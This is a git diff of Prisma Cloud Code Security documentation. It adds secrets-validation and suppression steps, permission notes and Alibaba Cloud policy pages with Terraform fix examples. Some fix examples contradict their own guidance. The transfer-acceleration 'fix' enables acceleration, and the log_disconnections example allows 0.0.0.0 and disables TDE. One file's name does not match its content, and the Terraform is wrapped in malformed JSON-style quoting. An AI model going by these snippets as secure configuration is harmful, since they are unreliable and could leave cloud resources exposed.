diff --git a/code-security/admin_guide/_graphics/secrets-validate-1.png b/code-security/admin_guide/_graphics/secrets-validate-1.png new file mode 100644 index 000000000..4a905f0ed Binary files /dev/null and b/code-security/admin_guide/_graphics/secrets-validate-1.png differ diff --git a/code-security/admin_guide/_graphics/secrets-validate-2.png b/code-security/admin_guide/_graphics/secrets-validate-2.png new file mode 100644 index 000000000..3f733f47c Binary files /dev/null and b/code-security/admin_guide/_graphics/secrets-validate-2.png differ diff --git a/code-security/admin_guide/_graphics/secrets-validate-3.png b/code-security/admin_guide/_graphics/secrets-validate-3.png new file mode 100644 index 000000000..c5693e6de Binary files /dev/null and b/code-security/admin_guide/_graphics/secrets-validate-3.png differ diff --git a/code-security/admin_guide/_graphics/secrets-validate-4.gif b/code-security/admin_guide/_graphics/secrets-validate-4.gif new file mode 100644 index 000000000..f3e2c96b4 Binary files /dev/null and b/code-security/admin_guide/_graphics/secrets-validate-4.gif differ diff --git a/code-security/admin_guide/get-started/connect-your-repositories/add-bitbucket-server.adoc b/code-security/admin_guide/get-started/connect-your-repositories/add-bitbucket-server.adoc index 9d2e72bb3..5361148dd 100644 --- a/code-security/admin_guide/get-started/connect-your-repositories/add-bitbucket-server.adoc +++ b/code-security/admin_guide/get-started/connect-your-repositories/add-bitbucket-server.adoc @@ -41,6 +41,11 @@ image::bitb-server-5.png[width=550] + By default, the access token's permissions are set similar to your current level of access. You need to define two levels of permissions - *Project permissions* and *Repository permission*. Repository permission inherits the Project permissions; thus, Repository permission should be as high as the Project permission. For example, if you have a Project write permission, you should also have a Repository write permission. You can always modify or revoke token permissions. If you need to know more about the Project and Repository permissions, see https://confluence.atlassian.com/bitbucketserver0717/personal-access-tokens-1087535496.html[here]. + +*Required Permissions:* + +* *For Projects - Read* +* *For Repositories - Admin* ++ image::bitb-server-6.png[width=550] .. Add *Expiry*. diff --git a/code-security/admin_guide/get-started/setup-administrator-access.adoc b/code-security/admin_guide/get-started/setup-administrator-access.adoc index a927fde66..d7c8b9a31 100644 --- a/code-security/admin_guide/get-started/setup-administrator-access.adoc +++ b/code-security/admin_guide/get-started/setup-administrator-access.adoc @@ -7,7 +7,9 @@ To know more see https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cl Administrators can create a custom permission group for Code Security on the Prisma Cloud console. Using the parameters for permissions, you can limit or enhance the responsibilities of the users. -* *Suppression Management*: You can enable user permissions to view, create, update and delete resources on *Repositories* (Settings > Repositories). These parameters enable suppression management for vulnerabilities found in resources. In addition, configuring view permission for all Code Security functions allows you to see the resource vulnerabilities to make informed decisions. +* *Repositories*: You can enable user permissions to view, create, update and delete resources on *Repositories* (Settings > Repositories). These parameters enable suppression management for vulnerabilities found in resources. In addition, configuring view permission for all Code Security functions allows you to see the resource vulnerabilities to make informed decisions. ++ +NOTE: You are required to select both Create and Update permissions when onboarding new repositories. * *Code Security Configuration*: Enabling permissions for Code Security Configuration helps you manage Code Security licenses, Enforcement thresholds, notifications, developer suppressions and creating rules to exclude paths for scans. diff --git a/code-security/admin_guide/scan-monitor/development-pipelines/enforcement.adoc b/code-security/admin_guide/scan-monitor/development-pipelines/enforcement.adoc index 91d9c2002..50204f997 100644 --- a/code-security/admin_guide/scan-monitor/development-pipelines/enforcement.adoc +++ b/code-security/admin_guide/scan-monitor/development-pipelines/enforcement.adoc @@ -50,40 +50,30 @@ To understand the default scan parameter on Prisma Cloud with the enforcement ru | | Info| Low | Medium | High | Critical -|Vulnerabilities -5+| Hard Fail - -Soft Fail - -Comment Bot - -|Licenses -5+| Hard Fail - -Soft Fail - -Comment Bot - -|IaC -5+| Hard Fail - -Soft Fail - -Comment Bot - -|Build Integrity -5+| Hard Fail - -Soft Fail - -Comment Bot - -|Secrets -5+| Hard Fail - -Soft Fail - -Comment Bot +.3+|Vulnerabilities +| | | | | Hard Fail +| |Soft Fail | | | +| |Comments Bot | | | + +.3+|Licenses +| | | | | Hard Fail +| |Soft Fail | | | +| |Comments Bot | | | + +.3+|IaC +| |Hard Fail | | | +| |Soft Fail | | | +| |Comments Bot | | | + +.3+|Build Integrity +| |Hard Fail | | | +| |Soft Fail | | | +| |Comments Bot | | | + +.3+|Secrets +| |Hard Fail | | | +| |Soft Fail | | | +| |Comments Bot | | | |=== diff --git a/code-security/admin_guide/scan-monitor/secrets-scanning.adoc b/code-security/admin_guide/scan-monitor/secrets-scanning.adoc index dd33724cb..1f1a3b2c3 100644 --- a/code-security/admin_guide/scan-monitor/secrets-scanning.adoc +++ b/code-security/admin_guide/scan-monitor/secrets-scanning.adoc @@ -1,6 +1,6 @@ == Secrets Scanning -You can use Code Security to detect and block secrets in IaC files stored in your IDEs, Git-based VCS, and CI/CD pipelines. +You can use Code Security to detect and block secrets in files in your IDEs, VCS repositories, and CI/CD pipelines. A secret is a programmatic access key that provides systems with access to information, services or assets. Developers use secrets such as API keys, encryption keys, OAuth tokens, certificates, PEM files, passwords, and passphrases to enable their application to securely communicate with other cloud services. @@ -9,25 +9,45 @@ For identifying secrets, Prisma Cloud provides default policies that use domain- image::scan-results-secrets-ide.png[width=800] +=== Validate Secrets + +When scanning for secrets, Prisma Cloud can validate secrets against public APIs to verify if the secret is still active so that you can prioritize and handle exposed secrets quickly. + +By default the validation of secrets is disabled and you can choose to enable the validation for secrets scan from *Settings > Code Security Configuration > Validate Secrets*. + +Additionally, you can choose to run Checkov on your repositories to filter valid secrets that may be potentially exposed. To see a list of potentially exposed secrets you need to add an environment variable `CKV_VALIDATE_SECRETS=true` after enabling Validate Secrets. + +In this example, you see a secret that is valid and requires to be prioritized in the repository after running Checkov on the terminal. + +image::secrets-validate-3.png[width=400] + +You can see the scan results of secrets after validation on *Projects > Secrets* and then use *Resource Explorer* to prioritize a valid secret by either a *Suppress* or by performing a *Manual Fix* on the secret. + +image::secrets-validate-4.gif[width=800] + [.task] === Suppress Secret Notifications -You have two ways to suppress notifications for a policy violation. You can either https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin/prisma-cloud-policies/manage-prisma-cloud-policies[disable] a policy or suppress a notification for a specific resource or repository. As an example, you do not want to be notified of a violation for issues on non-production environments, or for resources without specific tags. +By suppressing a notification for secrets you are choosing to no longer receive any information on a violation related to the suppressed secret. To suppress a notification you are required to define a suppression rule by adding a justification with an expiration time. [.procedure] -. Select *Code Security > Projects*. +. Select *Code Security > Projects > Secrets*. + +. Configure a suppression rule for a secret. -. Filter scan results. -.. Add *Category*-*Secrets*. -.. Add *Status*: *Errors*. +.. Select a secret and then *Suppress*. + -image::scan-results-secrets-1.png[width=800] +In this example, AWS Secret Keys are invalid in GitHub actions repository. ++ +image::secrets-validate-1.png[width=800] -. *Suppress* the notification. +.. Add a *Justification* with the *Expiration Time*. + -You can select the specific resource, or resources that are assigned a specific tag, or suppress notifications for this policy violation across one or more repositories. +image::secrets-validate-2.png[width=600] + -image::scan-results-secrets-2.png[width=800] +Optionally, you can choose a *Manual Fix* to resolve the secret violation. + +. Select *Save*. diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/alibaba-general-policies.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/alibaba-general-policies.adoc new file mode 100644 index 000000000..30639f71e --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/alibaba-general-policies.adoc @@ -0,0 +1,84 @@ +== Alibaba General Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-alibaba-cloud-database-instance-is-not-public.adoc[Alibaba Cloud database instance accessible to public] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py[CKV_ALI_9] +|LOW + + +|xref:ensure-alibaba-cloud-disk-is-encrypted-with-customer-master-key.adoc[Alibaba Cloud Disk is not encrypted with Customer Master Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py[CKV_ALI_8] +|LOW + + +|xref:ensure-alibaba-cloud-disk-is-encrypted.adoc[Alibaba Cloud disk encryption is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py[CKV_ALI_7] +|MEDIUM + + +|xref:ensure-alibaba-cloud-kms-key-rotation-is-enabled.adoc[Alibaba Cloud KMS Key Rotation is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py[CKV_ALI_27] +|LOW + + +|xref:ensure-alibaba-cloud-mongodb-has-transparent-data-encryption-enabled.adoc[Alibaba Cloud MongoDB does not have transparent data encryption enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py[CKV_ALI_44] +|LOW + + +|xref:ensure-alibaba-cloud-oss-bucket-has-transfer-acceleration-disabled.adoc[Alibaba Cloud OSS bucket has transfer Acceleration disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py[CKV_ALI_11] +|LOW + + +|xref:ensure-alibaba-cloud-oss-bucket-has-versioning-enabled.adoc[Alibaba Cloud OSS bucket has versioning disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py[CKV_ALI_10] +|LOW + + +|xref:ensure-alibaba-cloud-oss-bucket-is-encrypted-with-customer-master-key.adoc[Alibaba Cloud OSS bucket is not encrypted with Customer Master Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py[CKV_ALI_6] +|MEDIUM + + +|xref:ensure-alibaba-cloud-oss-bucket-is-not-accessible-to-public.adoc[Alibaba Cloud OSS bucket accessible to public] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py[CKV_ALI_1] +|LOW + + +|xref:ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled-1.adoc[Alibaba Cloud RDS instance has log_disconnections disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py[CKV_ALI_36] +|LOW + + +|xref:ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled.adoc[Alibaba Cloud KMS Key is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py[CKV_ALI_28] +|LOW + + +|xref:ensure-alibaba-cloud-rds-instance-has-log-duration-enabled.adoc[Alibaba Cloud RDS instance does not have log_duration enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py[CKV_ALI_35] +|LOW + + +|xref:ensure-alibaba-cloud-rds-instance-is-set-to-perform-auto-upgrades-for-minor-versions.adoc[Alibaba Cloud RDS instance is not set to perform auto upgrades for minor versions] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py[CKV_ALI_30] +|LOW + + +|xref:ensure-alibaba-cloud-rds-log-audit-is-enabled.adoc[Alibaba Cloud RDS log audit is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py[CKV_ALI_38] +|LOW + + +|xref:ensure-alibaba-rds-instance-has-log-connections-enabled.adoc[Alibaba RDS instance has log_connections disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py[CKV_ALI_37] +|LOW + + +|=== + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-database-instance-is-not-public.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-database-instance-is-not-public.adoc new file mode 100644 index 000000000..546c02ef9 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-database-instance-is-not-public.adoc @@ -0,0 +1,63 @@ +== Alibaba Cloud database instance accessible to public + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 22d28a0c-a979-4a99-8614-919dcc393ae4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py[CKV_ALI_9] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Public database instances are vulnerable, as attackers can use a variety of techniques to gain unauthorized access to public databases, such as SQL injection attacks, brute-force attacks, or exploiting misconfigurations or vulnerabilities in the database software. To prevent this risk, make the database instance private by restricting access to only authorized users. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_db_instance" "pass" { + engine = "MySQL" + engine_version = "5.6" + db_instance_class = "rds.mysql.t1.small" + db_instance_storage = "10" + security_ips = [ + "10.23.12.24" + ] + parameters = [{ + name = "innodb_large_prefix" + value = "ON" + }, { + + name = "connect_timeout" + value = "50" + }] + +} +", +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-disk-is-encrypted-with-customer-master-key.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-disk-is-encrypted-with-customer-master-key.adoc new file mode 100644 index 000000000..06e7c12ae --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-disk-is-encrypted-with-customer-master-key.adoc @@ -0,0 +1,56 @@ +== Alibaba Cloud Disk is not encrypted with Customer Master Key + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| db67af3f-47dd-49ca-9a96-ce12924d9d89 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py[CKV_ALI_8] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Encrypting your disk with a CMK helps protect your data from unauthorized access or tampering. +By encrypting your bucket, you can ensure that only authorized users with the correct key can access and decrypt the data, and that the data is protected while in storage. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_disk" "pass" { + # cn-beijing + description = "Hello ecs disk." + category = "cloud_efficiency" + size = "30" + encrypted = true + kms_key_id = "2a6767f0-a16c-1234-5678-13bf*****" + tags = { + Name = "TerraformTest" + } + +}", +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-disk-is-encrypted.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-disk-is-encrypted.adoc new file mode 100644 index 000000000..0d428d50c --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-disk-is-encrypted.adoc @@ -0,0 +1,80 @@ +== Alibaba Cloud disk encryption is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 305caeb2-efb9-4414-91fd-0c5cdeb70714 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py[CKV_ALI_7] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Disabling disk encryption leaves sensitive data stored on the disk vulnerable to unauthorized access and potential data breaches. If the disk is accessed by an unauthorized party, the sensitive data on it can be easily compromised, leading to loss of confidentiality and integrity of the data. To prevent this risk, enable Alibaba Cloud disk encryption. Snapshots created from disks that have been encrypted, as well as new disks created from those snapshots, will be encrypted automatically. + +//=== Fix - Runtime + + +//*Alibaba Cloud Portal Alibaba Cloud disk can only be encrypted at the time of disk creation.* + + +//So to resolve this alert, create a new disk with encryption and then migrate all required disk data from the reported disk to this newly created disk. +//To create an Alibaba Cloud disk with encryption: + +//. Log in to Alibaba Cloud Portal + +//. Go to Elastic Compute Service + +//. In the left-side navigation pane, click on 'Disks' which is under 'Storage & Snapshots'4. +//+ +//Click on 'Create Disk' + +//. Check the 'Disk Encryption' box in the 'Disk' section + +//. Click on 'Preview Order' make sure parameters are chosen correctly + +//. Click on 'Create', After you create a disk, attach that disk to other resources per your requirements. + +=== Fix - Buildtime + + +*Terraform* + +Add the following code to your Terraform file during buildtime. + +[source,go] +---- +{ + "resource "alicloud_disk" "pass" { + # cn-beijing + description = "Hello ecs disk." + category = "cloud_efficiency" + size = "30" + encrypted = true + kms_key_id = "2a6767f0-a16c-1234-5678-13bf*****" + tags = { + Name = "TerraformTest" + } + +}", +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-kms-key-rotation-is-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-kms-key-rotation-is-enabled.adoc new file mode 100644 index 000000000..a1a37a282 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-kms-key-rotation-is-enabled.adoc @@ -0,0 +1,55 @@ +== Alibaba Cloud KMS Key Rotation is disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 57146ef0-2467-4e9c-a474-7f99dc771640 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py[CKV_ALI_27] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +A key is a named object representing a cryptographic key used for a specific purpose, including data protection. +The key material, the actual bits used for encryption, can change over time as new key versions are created. +A collection of files could be encrypted with the same key and people with decrypt permissions on that key would be able to decrypt those files. +We recommend you set a key rotation period. +A key can be created with a specified rotation period, which is the time when new key versions are generated automatically. +A key can also be created with a specified next rotation time. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_kms_key" "pass" { + description = "Hello KMS" + pending_window_in_days = "7" + status = "Enabled" + automatic_rotation = "Enabled" +}", + +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-mongodb-has-transparent-data-encryption-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-mongodb-has-transparent-data-encryption-enabled.adoc new file mode 100644 index 000000000..d24a1dd26 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-mongodb-has-transparent-data-encryption-enabled.adoc @@ -0,0 +1,61 @@ +== Alibaba Cloud MongoDB does not have transparent data encryption enabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5a432551-8705-4aa2-b9fc-7f541e56669a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py[CKV_ALI_44] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Transparent data encryption for your Alibaba Cloud MongoDB helps protect your data from unauthorized access or tampering by encrypting the data as it is written to disk and decrypting it when it is accessed. +By enabling transparent data encryption, you can help ensure that only authorized users with the correct keys can access and decrypt the data, and that the data is protected while in storage. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_mongodb_instance" "pass" { + engine_version = "3.4" + db_instance_class = "dds.mongo.mid" + db_instance_storage = 10 + vswitch_id = alicloud_vswitch.ditch.id + security_ip_list = ["10.168.1.12", "100.69.7.112"] + kms_encryption_context= { + + } + + # tde_status = "Disabled" + ssl_action = "Update" + # not set + network_type = "VPC" + tde_status = "enabled" +}", + +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-has-transfer-acceleration-disabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-has-transfer-acceleration-disabled.adoc new file mode 100644 index 000000000..904e3d0a6 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-has-transfer-acceleration-disabled.adoc @@ -0,0 +1,53 @@ +== Alibaba Cloud OSS bucket has transfer Acceleration disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 11a6fc89-f3ed-4231-bbd0-74b28fd4bda8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py[CKV_ALI_11] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +The transfer acceleration function in Object Storage Service (OSS) enables quick access and transfer of stored objects for global users. However, it may result in higher data transfer costs since transfer acceleration incurs rates higher than those of standard transfer rates. To prevent this risk, disable transfer acceleration. + +=== Fix - Buildtime + + +*Terraform* + +Disable transfer acceleration by adding the following code to your Terraform file during buildtime. + + +[source,go] +---- +{ + "resource "alicloud_oss_bucket" "pass" { + bucket = "bucket_name" + + transfer_acceleration { + enabled = true + } + +}", +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-has-versioning-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-has-versioning-enabled.adoc new file mode 100644 index 000000000..4869c60a7 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-has-versioning-enabled.adoc @@ -0,0 +1,55 @@ +== Alibaba Cloud OSS bucket has versioning disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7e6a6a80-42b4-4609-b23c-101f0de481bc + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py[CKV_ALI_10] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Disabling versioning for an Alibaba Cloud OSS bucket can result in potential data loss, compliance issues, accidental deletion or modification, and a lack of ability to track changes. To prevent this risk enable bucket versioning to automatically archive all versions of an object, including writes and deletes. This allows you to recover previous versions of an object or restore an accidentally deleted object. + +=== Fix - Buildtime + + +*Terraform* + +Enable OSS bucket versioning by adding the following code to your Terraform file during buildtime. + + + +[source,go] +---- +{ + "resource "alicloud_oss_bucket" "pass" { + bucket = "bucket-123-versioning" + acl = "private" + + versioning { + status = "Enabled" + } + +}", +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-is-encrypted-with-customer-master-key.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-is-encrypted-with-customer-master-key.adoc new file mode 100644 index 000000000..d56696218 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-is-encrypted-with-customer-master-key.adoc @@ -0,0 +1,56 @@ +== Alibaba Cloud OSS bucket is not encrypted with Customer Master Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d5c45439-679c-4201-8267-5930c7257c31 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py[CKV_ALI_6] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Alibaba Cloud OSS buckets (OSS buckets) not encrypted with a customer master key renders the bucket vulnerable to unauthorized access and potential data breaches. If the bucket is accessed by an unauthorized party, the sensitive data on it can be easily compromised, leading to loss of confidentiality and integrity of the data. To prevent this risk encrypt OSS buckets with a CMK. + +=== Fix - Buildtime + + +*Terraform* + +Encrypt your OSS bucket by adding the following code to your Terraform file during buildtime. + + + +[source,go] +---- +{ + "resource "alicloud_oss_bucket" "pass" { + bucket = "bucket-123" + acl = "private" + + server_side_encryption_rule { + sse_algorithm = "KMS" + kms_master_key_id = "your kms key id" + } + +}", +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-is-not-accessible-to-public.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-is-not-accessible-to-public.adoc new file mode 100644 index 000000000..1809b8909 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-oss-bucket-is-not-accessible-to-public.adoc @@ -0,0 +1,68 @@ +== Alibaba Cloud OSS bucket accessible to public + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 05d705e6-5b6c-43ae-b2ab-5d6e279a66ae + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py[CKV_ALI_1] + +|Severity +|LOW + +|Subtype +|Build, +// Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Publicly accessible Object Storage Service (OSS) buckets are vulnerable, as attackers can gain unauthorized access to highly sensitive enterprise data which if left open to the public may result in sensitive data leaks. To prevent this risk ensure that the OSS bucket is made private by restricting access to authorized users only. + +//// +=== Fix - Runtime +Alibaba Cloud Portal +. Log in to Alibaba Cloud Portal + +. Go to Object Storage Service + +. In the left-side navigation pane, click on the reported bucket + +. In the 'Basic Settings' tab, In the 'Access Control List (ACL)' Section, Click on 'Configure' + +. For 'Bucket ACL' field, Choose 'Private' option + +. Click on 'Save' +//// + +=== Fix - Buildtime + + +*Terraform* + + +Make the OSS bucket private by adding the following code to your Terraform file during buildtime. + + +[source,go] +---- +{ + "resource "alicloud_oss_bucket" "good-bucket" { + bucket = "bucket-1732-acl" + acl = "private" +}", + +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled-1.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled-1.adoc new file mode 100644 index 000000000..9c0a806bd --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled-1.adoc @@ -0,0 +1,70 @@ +== Alibaba Cloud RDS instance has log_disconnections disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 70df95e5-51d6-4a46-9966-a0ea302ab91c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py[CKV_ALI_36] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Enabling the log_disconnections database flag logs at the end of each session, including the session duration. +RDS does not log session details by default, including duration and session end details. +Enabling the log_disconnections database flag creates log entries at the end of each session, which is useful when troubleshooting issues and determining unusual activity across a period. +We recommended you set the log_disconnections flag for a PostgreSQL instance to On. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_db_instance" "pass2" { + engine = "MySQL" + engine_version = "5.6" + instance_type = "rds.mysql.t1.small" + instance_storage = "10" + tde_status = "Disabled" + auto_upgrade_minor_version = "Manual" + # ssl_action="Closed" + security_ips = [ + "0.0.0.0", + "10.23.12.24/24" + ] + parameters { + name = "log_duration" + value = "on" + } + + + parameters { + name = "log_disconnections" + value = "on" + } + +}", +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled.adoc new file mode 100644 index 000000000..43b37e25c --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled.adoc @@ -0,0 +1,51 @@ +== Alibaba Cloud KMS Key is disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9b1cdf52-7013-4642-9c48-4427b8247fa0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py[CKV_ALI_28] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Enabling your KMS key helps protect your data from unauthorized access or tampering by encrypting the data and requiring users to provide the correct key in order to decrypt and access the data. +By enabling your KMS key, you can help ensure that only authorized users with the correct credentials can access your data. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_kms_key" "pass" { + description = "Hello KMS" + pending_window_in_days = "7" + status = "Enabled" + automatic_rotation = "Enabled" +}", + +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-duration-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-duration-enabled.adoc new file mode 100644 index 000000000..2ecdd3352 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-duration-enabled.adoc @@ -0,0 +1,38 @@ +== Alibaba Cloud RDS instance does not have log_duration enabled + + +=== Policy Details +[width=45%] 